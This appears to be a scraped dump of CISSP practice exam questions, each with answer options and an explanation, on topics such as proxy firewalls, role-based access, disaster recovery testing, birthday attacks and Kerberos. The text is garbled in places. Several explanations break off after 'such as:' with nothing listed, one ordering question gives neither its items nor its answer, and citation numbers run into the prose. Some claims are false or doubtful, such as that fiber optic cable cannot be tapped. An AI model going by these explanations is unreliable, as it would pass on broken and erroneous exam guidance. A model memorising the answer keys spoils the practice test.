According to the CISSP Official (ISC)2 Practice Tests2, a proxy firewall operates at the application layer of the Open System Interconnection (OSI) model. The OSI model is a conceptual framework that describes how data is transmitted and processed across a network, by dividing the functions into seven layers: physical, data link, network, transport, session, presentation, and application. A proxy firewall is a type of firewall that acts as an intermediary between the source and the destination of a network connection, by intercepting and inspecting the data packets at the application layer, which is the highest layer of the OSI model. The application layer is responsible for providing the interface and services for the applications and processes that communicate over the network, such as HTTP, FTP, SMTP, and DNS. A proxy firewall can filter and control the network traffic based on the content and context of the application layer protocols and messages, as well as perform caching, authentication, encryption, and logging functions. A proxy firewall does not operate at the transport layer, the data link layer, or the network layer of the OSI model, as these are lower layers that provide different functions, such as reliable and ordered delivery of data, physical and logical addressing of devices, and routing and forwarding of packets. References: 2
In which order, from MOST to LEAST impacted, does user awareness training reduce the occurrence of the events below?
The correct order is:
Comprehensive Explanation: User awareness training is a process of educating and informing users about the security policies, procedures, and best practices of an organization. User awareness training can help reduce the occurrence of security events by increasing the users’ knowledge, skills, and attitude towards security. User awareness training can have different impacts on different types of security events, depending on the nature and source of the events. The order of impact from most to least is as follows:
References: CISSP All-in-One Exam Guide, Eighth Edition, Chapter 7: Security Operations, p. 440; Official (ISC)2 CISSP CBK Reference, Fifth Edition, Domain 7: Security Operations, p. 852.
A security professional is asked to provide a solution that restricts a bank teller to only perform a savings deposit transaction but allows a supervisor to perform corrections after the transaction. Which of the following is the MOST effective solution?
Access is based on rules.
Access is determined by the system.
Access is based on user's role.
Access is based on data sensitivity.
The most effective solution that restricts a bank teller to only perform a savings deposit transaction but allows a supervisor to perform corrections after the transaction is that access is based on user’s role. Access is based on user’s role is a type of access control or a protection mechanism or process that grants or denies the access or the permission to the resources or the data within a system or a service, based on the role or the function of the user or the device within an organization, such as the bank teller, the supervisor, or the manager. Access is based on user’s role can provide a high level of security or protection for the system or the service, as it can prevent or reduce the risk of unauthorized or inappropriate access or permission to the resources or the data within the system or the service, by the user or the device that does not have the appropriate or the necessary role or function within the organization, such as the bank teller, the supervisor, or the manager. Access is based on user’s role can also provide the convenience or the ease of management for the system or the service, as it can simplify or streamline the access control or the protection mechanism or process, by assigning or applying the predefined or the preconfigured access or permission policies or rules to the role or the function of the user or the device within the organization, such as the bank teller, the supervisor, or the manager, rather than to the individual or the specific user or device within the organization, such as the John, the Mary, or the Bob. Access is based on user’s role is the most effective solution that restricts a bank teller to only perform a savings deposit transaction but allows a supervisor to perform corrections after the transaction, as it can ensure or maintain the security or the quality of the transactions or the data within the system or the service, by limiting or restricting the access or the permission to the transactions or the data within the system or the service, based on the role or the function of the user or the device within the organization, such as the bank teller, the supervisor, or the manager, and by allowing or enabling the different or the additional access or permission to the transactions or the data within the system or the service, based on the role or the function of the user or the device within the organization, such as the bank teller, the supervisor, or the manager.
References: CISSP All-in-One Exam Guide, Eighth Edition, Chapter 5, page 147; Official (ISC)2 CISSP CBK Reference, Fifth Edition, Chapter 5, page 212
Which of the following is a web application control that should be put into place to prevent exploitation of Operating System (OS) bugs?
Check arguments in function calls
Test for the security patch level of the environment
Include logging functions
Digitally sign each application module
Testing for the security patch level of the environment is the web application control that should be put into place to prevent exploitation of Operating System (OS) bugs. OS bugs are errors or defects in the code or logic of the OS that can cause the OS to malfunction or behave unexpectedly. OS bugs can be exploited by attackers to gain unauthorized access, disrupt business operations, or steal or leak sensitive data. Testing for the security patch level of the environment is the web application control that should be put into place to prevent exploitation of OS bugs, because it can provide several benefits, such as:
The other options are not the web application controls that should be put into place to prevent exploitation of OS bugs, but rather web application controls that can prevent or mitigate other types of web application attacks or issues. Checking arguments in function calls is a web application control that can prevent or mitigate buffer overflow attacks, which are attacks that exploit the vulnerability of the web application code that does not properly check the size or length of the input data that is passed to a function or a variable, and overwrite the adjacent memory locations with malicious code or data. Including logging functions is a web application control that can prevent or mitigate unauthorized access or modification attacks, which are attacks that exploit the lack of or weak authentication or authorization mechanisms of the web applications, and access or modify the web application data or functionality without proper permission or verification. Digitally signing each application module is a web application control that can prevent or mitigate code injection or tampering attacks, which are attacks that exploit the vulnerability of the web application code that does not properly validate or sanitize the input data that is executed or interpreted by the web application, and inject or modify the web application code with malicious code or data.
Which of the following is the BEST method to prevent malware from being introduced into a production environment?
Purchase software from a limited list of retailers
Verify the hash key or certificate key of all updates
Do not permit programs, patches, or updates from the Internet
Test all new software in a segregated environment
Testing all new software in a segregated environment is the best method to prevent malware from being introduced into a production environment. Malware is any malicious software that can harm or compromise the security, availability, integrity, or confidentiality of a system or data. Malware can be introduced into a production environment through various sources, such as software downloads, updates, patches, or installations. Testing all new software in a segregated environment involves verifying and validating the functionality and security of the software before deploying it to the production environment, using a separate system or network that is isolated and protected from the production environment. Testing all new software in a segregated environment can provide several benefits, such as:
The other options are not the best methods to prevent malware from being introduced into a production environment, but rather methods that can reduce or mitigate the risk of malware, but not eliminate it. Purchasing software from a limited list of retailers is a method that can reduce the risk of malware from being introduced into a production environment, but not prevent it. This method involves obtaining software only from trusted and reputable sources, such as official vendors or distributors, that can provide some assurance of the quality and security of the software. However, this method does not guarantee that the software is free of malware, as it may still contain hidden or embedded malware, or it may be tampered with or compromised during the delivery or installation process. Verifying the hash key or certificate key of all updates is a method that can reduce the risk of malware from being introduced into a production environment, but not prevent it. This method involves checking the authenticity and integrity of the software updates, patches, or installations, by comparing the hash key or certificate key of the software with the expected or published value, using cryptographic techniques and tools. However, this method does not guarantee that the software is free of malware, as it may still contain malware that is not detected or altered by the hash key or certificate key, or it may be subject to a man-in-the-middle attack or a replay attack that can intercept or modify the software or the key. Not permitting programs, patches, or updates from the Internet is a method that can reduce the risk of malware from being introduced into a production environment, but not prevent it. This method involves restricting or blocking the access or download of software from the Internet, which is a common and convenient source of malware, by applying and enforcing the appropriate security policies and controls, such as firewall rules, antivirus software, or web filters. However, this method does not guarantee that the software is free of malware, as it may still be obtained or infected from other sources, such as removable media, email attachments, or network shares.
The configuration management and control task of the certification and accreditation process is incorporated in which phase of the System Development Life Cycle (SDLC)?
System acquisition and development
System operations and maintenance
System initiation
System implementation
The configuration management and control task of the certification and accreditation process is incorporated in the system acquisition and development phase of the System Development Life Cycle (SDLC). The SDLC is a process that involves planning, designing, developing, testing, deploying, operating, and maintaining a system, using various models and methodologies, such as waterfall, spiral, agile, or DevSecOps. The SDLC can be divided into several phases, each with its own objectives and activities, such as:
The certification and accreditation process is a process that involves assessing and verifying the security and compliance of a system, and authorizing and approving the system operation and maintenance, using various standards and frameworks, such as NIST SP 800-37 or ISO/IEC 27001. The certification and accreditation process can be divided into several tasks, each with its own objectives and activities, such as:
The configuration management and control task of the certification and accreditation process is incorporated in the system acquisition and development phase of the SDLC, because it can ensure that the system design and development are consistent and compliant with the security objectives and requirements, and that the system changes are controlled and documented. Configuration management and control is a process that involves establishing and maintaining the baseline and the inventory of the system components and resources, such as hardware, software, data, or documentation, and tracking and recording any modifications or updates to the system components and resources, using various techniques and tools, such as version control, change control, or configuration audits. Configuration management and control can provide several benefits, such as:
The other options are not the phases of the SDLC that incorporate the configuration management and control task of the certification and accreditation process, but rather phases that involve other tasks of the certification and accreditation process. System operations and maintenance is a phase of the SDLC that incorporates the security monitoring task of the certification and accreditation process, because it can ensure that the system operation and maintenance are consistent and compliant with the security objectives and requirements, and that the system security is updated and improved. System initiation is a phase of the SDLC that incorporates the security categorization and security planning tasks of the certification and accreditation process, because it can ensure that the system scope and objectives are defined and aligned with the security objectives and requirements, and that the security plan and policy are developed and documented. System implementation is a phase of the SDLC that incorporates the security assessment and security authorization tasks of the certification and accreditation process, because it can ensure that the system deployment and installation are evaluated and verified for the security effectiveness and compliance, and that the system operation and maintenance are authorized and approved based on the risk and impact analysis and the security objectives and requirements.
What is the BEST approach to addressing security issues in legacy web applications?
Debug the security issues
Migrate to newer, supported applications where possible
Conduct a security assessment
Protect the legacy application with a web application firewall
Migrating to newer, supported applications where possible is the best approach to addressing security issues in legacy web applications. Legacy web applications are web applications that are outdated, unsupported, or incompatible with the current technologies and standards. Legacy web applications may have various security issues, such as:
Migrating to newer, supported applications where possible is the best approach to addressing security issues in legacy web applications, because it can provide several benefits, such as:
The other options are not the best approaches to addressing security issues in legacy web applications, but rather approaches that can mitigate or remediate the security issues, but not eliminate or prevent them. Debugging the security issues is an approach that can mitigate the security issues in legacy web applications, but not the best approach, because it involves identifying and fixing the errors or defects in the code or logic of the web applications, which may be difficult or impossible to do for the legacy web applications that are outdated or unsupported. Conducting a security assessment is an approach that can remediate the security issues in legacy web applications, but not the best approach, because it involves evaluating and testing the security effectiveness and compliance of the web applications, using various techniques and tools, such as audits, reviews, scans, or penetration tests, and identifying and reporting any security weaknesses or gaps, which may not be sufficient or feasible to do for the legacy web applications that are incompatible or obsolete. Protecting the legacy application with a web application firewall is an approach that can mitigate the security issues in legacy web applications, but not the best approach, because it involves deploying and configuring a web application firewall, which is a security device or software that monitors and filters the web traffic between the web applications and the users or clients, and blocks or allows the web requests or responses based on the predefined rules or policies, which may not be effective or efficient to do for the legacy web applications that have weak or outdated encryption or authentication mechanisms.
What technique BEST describes antivirus software that detects viruses by watching anomalous behavior?
Signature
Inference
Induction
Heuristic
Heuristic is the technique that best describes antivirus software that detects viruses by watching anomalous behavior. Heuristic is a method of virus detection that analyzes the behavior and characteristics of the program or file, rather than comparing it to a known signature or pattern. Heuristic can detect unknown or new viruses that have not been identified or cataloged by the antivirus software. However, heuristic can also generate false positives, as some legitimate programs or files may exhibit suspicious or unusual behavior12. References: 1: What is Heuristic Analysis?32: Heuristic Virus Detection4
The key benefits of a signed and encrypted e-mail include
confidentiality, authentication, and authorization.
confidentiality, non-repudiation, and authentication.
non-repudiation, authorization, and authentication.
non-repudiation, confidentiality, and authorization.
A signed and encrypted e-mail provides confidentiality by preventing unauthorized access to the message content, non-repudiation by verifying the identity and integrity of the sender, and authentication by ensuring that the message is from the claimed source. Authorization is not a benefit of a signed and encrypted e-mail, as it refers to the process of granting or denying access to resources based on predefined rules.
Which layer of the Open Systems Interconnections (OSI) model implementation adds information concerning the logical connection between the sender and receiver?
Physical
Session
Transport
Data-Link
The Transport layer of the Open Systems Interconnection (OSI) model implementation adds information concerning the logical connection between the sender and receiver. The Transport layer is responsible for establishing, maintaining, and terminating the end-to-end communication between two hosts, as well as ensuring the reliability, integrity, and flow control of the data. The Transport layer uses protocols such as TCP and UDP to provide connection-oriented or connectionless services, and adds headers that contain information such as source and destination ports, sequence and acknowledgment numbers, and checksums . References: : CISSP All-in-One Exam Guide, Eighth Edition, Chapter 5, page 499. : CISSP For Dummies, 7th Edition, Chapter 5, page 145.
A security professional has just completed their organization's Business Impact Analysis (BIA). Following Business Continuity Plan/Disaster Recovery Plan (BCP/DRP) best practices, what would be the professional's NEXT step?
Identify and select recovery strategies.
Present the findings to management for funding.
Select members for the organization's recovery teams.
Prepare a plan to test the organization's ability to recover its operations.
The next step after completing the organization’s Business Impact Analysis (BIA) is to identify and select recovery strategies. A BIA is a process of analyzing the potential impact and consequences of a disruption or disaster on the organization’s critical business functions and processes. A BIA helps to identify the recovery objectives, priorities, and requirements for the organization. Based on the BIA results, the organization should identify and select the recovery strategies that are suitable and feasible for restoring the critical business functions and processes within the acceptable time frame and cost. The recovery strategies may include technical, operational, organizational, or contractual solutions, such as backup systems, alternate sites, mutual aid agreements, or insurance policies . References: : Business Impact Analysis | Ready.gov : Business Continuity Planning Process Diagram
What would be the PRIMARY concern when designing and coordinating a security assessment for an Automatic Teller Machine (ATM) system?
Physical access to the electronic hardware
Regularly scheduled maintenance process
Availability of the network connection
Processing delays
The primary concern when designing and coordinating a security assessment for an Automatic Teller Machine (ATM) system is the availability of the network connection. An ATM system relies on a network connection to communicate with the bank’s servers and process the transactions of the customers. If the network connection is disrupted, degraded, or compromised, the ATM system may not be able to function properly, or may expose the customers’ data or money to unauthorized access or theft. Therefore, a security assessment for an ATM system should focus on ensuring that the network connection is reliable, resilient, and secure, and that there are backup or alternative solutions in case of network failure12. References: 1: ATM Security: Best Practices for Automated Teller Machines32: ATM Security: A Comprehensive Guide4
What is the MOST effective countermeasure to a malicious code attack against a mobile system?
Sandbox
Change control
Memory management
Public-Key Infrastructure (PKI)
A sandbox is a security mechanism that isolates a potentially malicious code or application from the rest of the system, preventing it from accessing or modifying any sensitive data or resources1. A sandbox can be implemented at the operating system, application, or network level, and can provide a safe environment for testing, debugging, or executing untrusted code. A sandbox is the most effective countermeasure to a malicious code attack against a mobile system, as it can prevent the code from spreading, stealing, or destroying any information on the device. Change control, memory management, and PKI are not directly related to preventing or mitigating malicious code attacks on mobile systems. References: 1: CISSP All-in-One Exam Guide, Eighth Edition, Chapter 8, page 507.
The birthday attack is MOST effective against which one of the following cipher technologies?
Chaining block encryption
Asymmetric cryptography
Cryptographic hash
Streaming cryptography
The birthday attack is most effective against cryptographic hash, which is one of the cipher technologies. A cryptographic hash is a function that takes an input of any size and produces an output of a fixed size, called a hash or a digest, that represents the input. A cryptographic hash has several properties, such as being one-way, collision-resistant, and deterministic3. A birthday attack is a type of brute-force attack that exploits the mathematical phenomenon known as the birthday paradox, which states that in a set of randomly chosen elements, there is a high probability that some pair of elements will have the same value. A birthday attack can be used to find collisions in a cryptographic hash, which means finding two different inputs that produce the same hash. Finding collisions can compromise the integrity or the security of the hash, as it can allow an attacker to forge or modify the input without changing the hash. Chaining block encryption, asymmetric cryptography, and streaming cryptography are not as vulnerable to the birthday attack, as they are different types of encryption algorithms that use keys and ciphers to transform the input into an output. References: 3: Official (ISC)2 CISSP CBK Reference, 5th Edition, Chapter 3, page 133. : CISSP All-in-One Exam Guide, Eighth Edition, Chapter 3, page 143.
While impersonating an Information Security Officer (ISO), an attacker obtains information from company employees about their User IDs and passwords. Which method of information gathering has the attacker used?
Trusted path
Malicious logic
Social engineering
Passive misuse
Social engineering is the method of information gathering that the attacker has used while impersonating an ISO and obtaining information from company employees about their User IDs and passwords. Social engineering is a technique of manipulating or deceiving people into revealing confidential or sensitive information, or performing actions that compromise the security of an organization or a system1. Social engineering can exploit the human factors, such as trust, curiosity, fear, or greed, to influence the behavior or judgment of the target. Social engineering can take various forms, such as phishing, baiting, pretexting, or impersonation. Trusted path, malicious logic, and passive misuse are not methods of information gathering that the attacker has used, as they are related to different aspects of security or attack. References: 1: CISSP All-in-One Exam Guide, Eighth Edition, Chapter 1, page 19.
Which of the following would be the FIRST step to take when implementing a patch management program?
Perform automatic deployment of patches.
Monitor for vulnerabilities and threats.
Prioritize vulnerability remediation.
Create a system inventory.
The first step to take when implementing a patch management program is to create a system inventory. A system inventory is a comprehensive list of all the hardware and software assets in the organization, such as servers, workstations, laptops, mobile devices, routers, switches, firewalls, operating systems, applications, firmware, etc. A system inventory helps to identify the scope and complexity of the patch management program, as well as the current patch status and vulnerabilities of each asset. A system inventory also helps to prioritize and schedule patch deployment, monitor patch compliance, and report patch performance56. References: 5: Patch Management Best Practices76: Patch Management Process8
What is the MOST important purpose of testing the Disaster Recovery Plan (DRP)?
Evaluating the efficiency of the plan
Identifying the benchmark required for restoration
Validating the effectiveness of the plan
Determining the Recovery Time Objective (RTO)
The most important purpose of testing the Disaster Recovery Plan (DRP) is to validate the effectiveness of the plan. A DRP is a document that outlines the procedures and steps to be followed in the event of a disaster that disrupts the normal operations of an organization. A DRP aims to minimize the impact of the disaster, restore the critical functions and systems, and resume the normal operations as soon as possible. Testing the DRP is essential to ensure that the plan is feasible, reliable, and up-to-date. Testing the DRP can reveal any errors, gaps, or weaknesses in the plan, and provide feedback and recommendations for improvement. Testing the DRP can also increase the confidence and readiness of the staff, and ensure compliance with the regulatory and contractual requirements97. References: 9: What Is Disaster Recovery Testing and Why Is It Important?107: Disaster Recovery Plan Testing in IT
Which one of these risk factors would be the LEAST important consideration in choosing a building site for a new computer facility?
Vulnerability to crime
Adjacent buildings and businesses
Proximity to an airline flight path
Vulnerability to natural disasters
Proximity to an airline flight path is the least important consideration in choosing a building site for a new computer facility, as it poses the lowest risk factor compared to the other options. Proximity to an airline flight path may cause some noise or interference issues, but it is unlikely to result in a major disaster or damage to the computer facility, unless there is a rare case of a plane crash or a terrorist attack3. Vulnerability to crime, adjacent buildings and businesses, and vulnerability to natural disasters are more important considerations in choosing a building site for a new computer facility, as they can pose significant threats to the physical security, availability, and integrity of the facility and its assets. Vulnerability to crime can expose the facility to theft, vandalism, or sabotage. Adjacent buildings and businesses can affect the fire safety, power supply, or environmental conditions of the facility. Vulnerability to natural disasters can cause the facility to suffer from floods, earthquakes, storms, or fires. References: 3: Official (ISC)2 CISSP CBK Reference, 5th Edition, Chapter 10, page 543.
The overall goal of a penetration test is to determine a system's
ability to withstand an attack.
capacity management.
error recovery capabilities.
reliability under stress.
A penetration test is a simulated attack on a system or network, performed by authorized testers, to evaluate the security posture and identify vulnerabilities that could be exploited by malicious actors. The overall goal of a penetration test is to determine the system’s ability to withstand an attack, and to provide recommendations for improving the security controls and mitigating the risks12. References: 1: CISSP All-in-One Exam Guide, Eighth Edition, Chapter 7, page 7572: CISSP For Dummies, 7th Edition, Chapter 7, page 233.
Which of the following is a security feature of Global Systems for Mobile Communications (GSM)?
It uses a Subscriber Identity Module (SIM) for authentication.
It uses encrypting techniques for all communications.
The radio spectrum is divided with multiple frequency carriers.
The signal is difficult to read as it provides end-to-end encryption.
A security feature of Global Systems for Mobile Communications (GSM) is that it uses a Subscriber Identity Module (SIM) for authentication. A SIM is a smart card that contains the subscriber’s identity, phone number, network information, and encryption keys. The SIM is inserted into the mobile device and communicates with the network to authenticate the subscriber and establish a secure connection. The SIM also stores the subscriber’s contacts, messages, and preferences. The SIM provides security by preventing unauthorized access to the subscriber’s account and data, and by allowing the subscriber to easily switch devices without losing their information12. References: 1: GSM - Security and Encryption32: Introduction to GSM security
Multi-threaded applications are more at risk than single-threaded applications to
race conditions.
virus infection.
packet sniffing.
database injection.
Multi-threaded applications are more at risk than single-threaded applications to race conditions. A race condition is a type of concurrency error that occurs when two or more threads access or modify the same shared resource without proper synchronization or coordination. This may result in inconsistent, unpredictable, or erroneous outcomes, as the final result depends on the timing and order of the thread execution. Race conditions can compromise the security, reliability, and functionality of the application, and can lead to data corruption, memory leaks, deadlock, or privilege escalation12. References: 1: What is a Race Condition?32: Race Conditions - OWASP Cheat Sheet Series4
In the area of disaster planning and recovery, what strategy entails the presentation of information about the plan?
Communication
Planning
Recovery
Escalation
Communication is the strategy that involves the presentation of information about the disaster recovery plan to the stakeholders, such as management, employees, customers, vendors, and regulators. Communication ensures that everyone is aware of their roles and responsibilities in the event of a disaster, and that the plan is updated and tested regularly12. References: 1: CISSP All-in-One Exam Guide, Eighth Edition, Chapter 10, page 10192: CISSP For Dummies, 7th Edition, Chapter 10, page 343.
An organization is selecting a service provider to assist in the consolidation of multiple computing sites including development, implementation and ongoing support of various computer systems. Which of the following MUST be verified by the Information Security Department?
The service provider's policies are consistent with ISO/IEC27001 and there is evidence that the service provider is following those policies.
The service provider will segregate the data within its systems and ensure that each region's policies are met.
The service provider will impose controls and protections that meet or exceed the current systems controls and produce audit logs as verification.
The service provider's policies can meet the requirements imposed by the new environment even if they differ from the organization's current policies.
The Information Security Department must verify that the service provider will impose controls and protections that meet or exceed the current systems controls and produce audit logs as verification. This is to ensure that the service provider will maintain or improve the security posture of the organization, and that the organization will be able to monitor and audit the service provider’s performance and compliance. The service provider’s policies may or may not be consistent with ISO/IEC27001, but this is not a mandatory requirement, as long as the service provider can meet the organization’s security needs and expectations. The service provider may or may not segregate the data within its systems, depending on the type and sensitivity of the data, and the contractual and regulatory obligations. The service provider’s policies may differ from the organization’s current policies, as long as they can meet the requirements imposed by the new environment, and are agreed upon by both parties. References: 1: How to Choose a Managed Security Service Provider (MSSP)22: 10 Questions to Ask Your Managed Security Service Provider3
Logical access control programs are MOST effective when they are
approved by external auditors.
combined with security token technology.
maintained by computer security officers.
made part of the operating system.
Logical access control programs are most effective when they are made part of the operating system. Logical access control is the process of granting or denying access to information or resources based on the identity, role, or credentials of the user or device3. Logical access control programs, such as authentication, authorization, and auditing mechanisms, can be implemented at different levels of the system, such as the application, the database, or the network. However, the most effective level is the operating system, as it provides the lowest and most comprehensive layer of access control, and can enforce the principle of least privilege and the separation of duties for all users and processes. Approval by external auditors, combination with security token technology, and maintenance by computer security officers are not factors that affect the effectiveness of logical access control programs, as they are more related to the compliance, assurance, and administration of the access control policies. References: 3: Official (ISC)2 CISSP CBK Reference, 5th Edition, Chapter 5, page 247. : CISSP All-in-One Exam Guide, Eighth Edition, Chapter 6, page 353.
Which of the following is the MOST important consideration when storing and processing Personally Identifiable Information (PII)?
Encrypt and hash all PII to avoid disclosure and tampering.
Store PII for no more than one year.
Avoid storing PII in a Cloud Service Provider.
Adherence to collection limitation laws and regulations.
The most important consideration when storing and processing PII is to adhere to the collection limitation laws and regulations that apply to the jurisdiction and context of the data processing. Collection limitation is a principle that states that PII should be collected only for a specific, legitimate, and lawful purpose, and only to the extent that is necessary for that purpose1. By following this principle, the data processor can minimize the amount of PII that is stored and processed, and reduce the risk of data breaches, misuse, or unauthorized access. Encrypting and hashing all PII, storing PII for no more than one year, and avoiding storing PII in a cloud service provider are also good practices for protecting PII, but they are not as important as adhering to the collection limitation laws and regulations. References: 1: CISSP All-in-One Exam Guide, Eighth Edition, Chapter 5, page 290.
An organization allows ping traffic into and out of their network. An attacker has installed a program on the network that uses the payload portion of the ping packet to move data into and out of the network. What type of attack has the organization experienced?
Data leakage
Unfiltered channel
Data emanation
Covert channel
The organization has experienced a covert channel attack, which is a technique of hiding or transferring data within a communication channel that is not intended for that purpose. In this case, the attacker has used the payload portion of the ping packet, which is normally used to carry diagnostic data, to move data into and out of the network. This way, the attacker can bypass the network security controls and avoid detection. Data leakage (A) is a general term for the unauthorized disclosure of sensitive or confidential data, which may or may not involve a covert channel. Unfiltered channel (B) is a term for a communication channel that does not have any security mechanisms or filters applied to it, which may allow unauthorized or malicious traffic to pass through. Data emanation © is a term for the unintentional radiation or emission of electromagnetic signals from electronic devices, which may reveal sensitive or confidential information to eavesdroppers. References: CISSP All-in-One Exam Guide, Eighth Edition, Chapter 4, page 179; Official (ISC)2 CISSP CBK Reference, Fifth Edition, Chapter 4, page 189.
Which type of control recognizes that a transaction amount is excessive in accordance with corporate policy?
Detection
Prevention
Investigation
Correction
A detection control is a type of control that identifies and reports the occurrence of an unwanted event, such as a violation of a policy or a threshold. A detection control does not prevent or correct the event, but rather alerts the appropriate personnel or system to take action34. References: 3: CISSP All-in-One Exam Guide, Eighth Edition, Chapter 1, page 294: CISSP For Dummies, 7th Edition, Chapter 1, page 21.
Which of the following BEST represents the principle of open design?
Disassembly, analysis, or reverse engineering will reveal the security functionality of the computer system.
Algorithms must be protected to ensure the security and interoperability of the designed system.
A knowledgeable user should have limited privileges on the system to prevent their ability to compromise security capabilities.
The security of a mechanism should not depend on the secrecy of its design or implementation.
This is the principle of open design, which states that the security of a system or mechanism should rely on the strength of its key or algorithm, rather than on the obscurity of its design or implementation. This principle is based on the assumption that the adversary has full knowledge of the system or mechanism, and that the security should still hold even if that is the case. The other options are not consistent with the principle of open design, as they either imply that the security depends on hiding or protecting the design or implementation (A and B), or that the user’s knowledge or privileges affect the security ©. References: CISSP All-in-One Exam Guide, Eighth Edition, Chapter 3, page 105; Official (ISC)2 CISSP CBK Reference, Fifth Edition, Chapter 3, page 109.
When constructing an Information Protection Policy (IPP), it is important that the stated rules are necessary, adequate, and
flexible.
confidential.
focused.
achievable.
An Information Protection Policy (IPP) is a document that defines the objectives, scope, roles, responsibilities, and rules for protecting the information assets of an organization. An IPP should be aligned with the business goals and legal requirements, and should be communicated and enforced throughout the organization. When constructing an IPP, it is important that the stated rules are necessary, adequate, and achievable, meaning that they are relevant, sufficient, and realistic for the organization’s context and capabilities34. References: 3: CISSP All-in-One Exam Guide, Eighth Edition, Chapter 1, page 234: CISSP For Dummies, 7th Edition, Chapter 1, page 15.
Which one of the following transmission media is MOST effective in preventing data interception?
Microwave
Twisted-pair
Fiber optic
Coaxial cable
Fiber optic is the most effective transmission media in preventing data interception, as it uses light signals to transmit data over thin glass or plastic fibers1. Fiber optic cables are immune to electromagnetic interference, which means that they cannot be tapped or eavesdropped by external devices or signals. Fiber optic cables also have a low attenuation rate, which means that they can transmit data over long distances without losing much signal strength or quality. Microwave, twisted-pair, and coaxial cable are less effective transmission media in preventing data interception, as they use electromagnetic waves or electrical signals to transmit data over metal wires or air2. These media are susceptible to interference, noise, or tapping, which can compromise the confidentiality or integrity of the data. References: 1: CISSP All-in-One Exam Guide, Eighth Edition, Chapter 7, page 4062: CISSP For Dummies, 7th Edition, Chapter 4, page 85.
Which of the following is ensured when hashing files during chain of custody handling?
Availability
Accountability
Integrity
Non-repudiation
Hashing files during chain of custody handling ensures integrity, which means that the files have not been altered or tampered with during the collection, preservation, or analysis of digital evidence1. Hashing is a process of applying a mathematical function to a file to generate a unique value, called a hash or a digest, that represents the file’s content. By comparing the hash values of the original and the copied files, the integrity of the files can be verified. Availability, accountability, and non-repudiation are not ensured by hashing files during chain of custody handling, as they are related to different aspects of information security. References: 1: CISSP All-in-One Exam Guide, Eighth Edition, Chapter 10, page 633.
Which one of the following effectively obscures network addresses from external exposure when implemented on a firewall or router?
Network Address Translation (NAT)
Application Proxy
Routing Information Protocol (RIP) Version 2
Address Masking
Network Address Translation (NAT) is the most effective method for obscuring network addresses from external exposure when implemented on a firewall or router. NAT is a technique that allows a device, such as a firewall or a router, to modify the source or destination IP address of a packet as it passes through the device3. NAT can be used to hide the internal IP addresses of a network from the external network, such as the internet, by replacing them with a public IP address. This can enhance the security and privacy of the network, as well as conserve the limited IPv4 address space. Application proxy, RIP version 2, and address masking are not methods for obscuring network addresses from external exposure, as they are either related to different functions or not implemented on a firewall or router. References: 3: Official (ISC)2 CISSP CBK Reference, 5th Edition, Chapter 4, page 196. : CISSP All-in-One Exam Guide, Eighth Edition, Chapter 7, page 413.
Alternate encoding such as hexadecimal representations is MOST often observed in which of the following forms of attack?
Smurf
Rootkit exploit
Denial of Service (DoS)
Cross site scripting (XSS)
Alternate encoding such as hexadecimal representations is most often observed in cross site scripting (XSS) attacks. XSS is a type of web application attack that involves injecting malicious code or scripts into a web page or a web application, usually through user input fields or parameters. The malicious code or script is then executed by the victim’s browser, and can perform various actions, such as stealing cookies, session tokens, or credentials, redirecting to malicious sites, or displaying fake content. Alternate encoding is a technique that is used by attackers to bypass input validation or filtering mechanisms, and to conceal or obfuscate the malicious code or script. Alternate encoding can use hexadecimal, decimal, octal, binary, or Unicode representations of the characters or symbols in the code or script . References: : What is Cross-Site Scripting (XSS)? : XSS Filter Evasion Cheat Sheet
Why MUST a Kerberos server be well protected from unauthorized access?
It contains the keys of all clients.
It always operates at root privilege.
It contains all the tickets for services.
It contains the Internet Protocol (IP) address of all network entities.
A Kerberos server must be well protected from unauthorized access because it contains the keys of all clients. Kerberos is a network authentication protocol that uses symmetric cryptography and a trusted third party, called the Key Distribution Center (KDC), to provide secure and mutual authentication between clients and servers2. The KDC consists of two components: the Authentication Server (AS) and the Ticket Granting Server (TGS). The AS issues a Ticket Granting Ticket (TGT) to the client after verifying its identity and password. The TGS issues a service ticket to the client after validating its TGT and the requested service. The client then uses the service ticket to access the service. The KDC stores the keys of all clients and services in its database, and uses them to encrypt and decrypt the tickets. If an attacker gains access to the KDC, they can compromise the keys and the tickets, and impersonate any client or service on the network. References: 2: CISSP For Dummies, 7th Edition, Chapter 4, page 91.
In a basic SYN flood attack, what is the attacker attempting to achieve?
Exceed the threshold limit of the connection queue for a given service
Set the threshold to zero for a given service
Cause the buffer to overflow, allowing root access
Flush the register stack, allowing hijacking of the root account
A SYN flood attack is a type of denial-of-service attack that exploits the TCP three-way handshake process. The attacker sends a large number of SYN packets to the target server, often with spoofed IP addresses, and does not complete the handshake by sending the final ACK packet. This causes the server to allocate resources for half-open connections, which eventually consume all the available ports and prevent legitimate traffic from reaching the server
Which of the following is an initial consideration when developing an information security management system?
Identify the contractual security obligations that apply to the organizations
Understand the value of the information assets
Identify the level of residual risk that is tolerable to management
Identify relevant legislative and regulatory compliance requirements
When developing an information security management system (ISMS), an initial consideration is to understand the value of the information assets that the organization owns or processes. An information asset is any data, information, or knowledge that has value to the organization and supports its mission, objectives, and operations. Understanding the value of the information assets helps to determine the appropriate level of protection and investment for them, as well as the potential impact and consequences of losing, compromising, or disclosing them. Understanding the value of the information assets also helps to identify the stakeholders, owners, and custodians of the information assets, and their roles and responsibilities in the ISMS.
The other options are not initial considerations, but rather subsequent or concurrent considerations when developing an ISMS. Identifying the contractual security obligations that apply to the organizations is a consideration that depends on the nature, scope, and context of the information assets, as well as the relationships and agreements with the external parties. Identifying the level of residual risk that is tolerable to management is a consideration that depends on the risk appetite and tolerance of the organization, as well as the risk assessment and analysis of the information assets. Identifying relevant legislative and regulatory compliance requirements is a consideration that depends on the legal and ethical obligations and expectations of the organization, as well as the jurisdiction and industry of the information assets.
An organization has doubled in size due to a rapid market share increase. The size of the Information Technology (IT) staff has maintained pace with this growth. The organization hires several contractors whose onsite time is limited. The IT department has pushed its limits building servers and rolling out workstations and has a backlog of account management requests.
Which contract is BEST in offloading the task from the IT staff?
Platform as a Service (PaaS)
Identity as a Service (IDaaS)
Desktop as a Service (DaaS)
Software as a Service (SaaS)
Identity as a Service (IDaaS) is the best contract in offloading the task of account management from the IT staff. IDaaS is a cloud-based service that provides identity and access management (IAM) functions, such as user authentication, authorization, provisioning, deprovisioning, password management, single sign-on (SSO), and multifactor authentication (MFA). IDaaS can help the organization to streamline and automate the account management process, reduce the workload and costs of the IT staff, and improve the security and compliance of the user accounts. IDaaS can also support the contractors who have limited onsite time, as they can access the organization’s resources remotely and securely through the IDaaS provider.
